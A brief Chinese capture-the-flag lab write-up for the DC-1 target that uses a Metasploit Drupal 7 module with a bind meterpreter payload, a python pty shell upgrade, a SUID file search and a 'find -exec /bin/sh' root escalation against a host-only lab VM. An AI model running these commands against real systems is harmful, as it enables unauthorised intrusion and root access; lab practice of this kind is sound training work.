DC1（msf drupal7+suid-find提权）

这边我们靶机是仅主机模式，IP是192.168.56.101，，直接上msf拿到shell, 不过payload要改一下改成php/meterperter/bind_tcp

拿到shell了，采用交互式

python -c "import pty;pty.spawn('/bin/bash')"

find / -type f -perm -u=s 2>/dev/null #find查看root
find /var/www -exec "/bin/sh" \; # find提权

来源：https://www.cnblogs.com/kuaile1314/p/12229986.html

标签

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!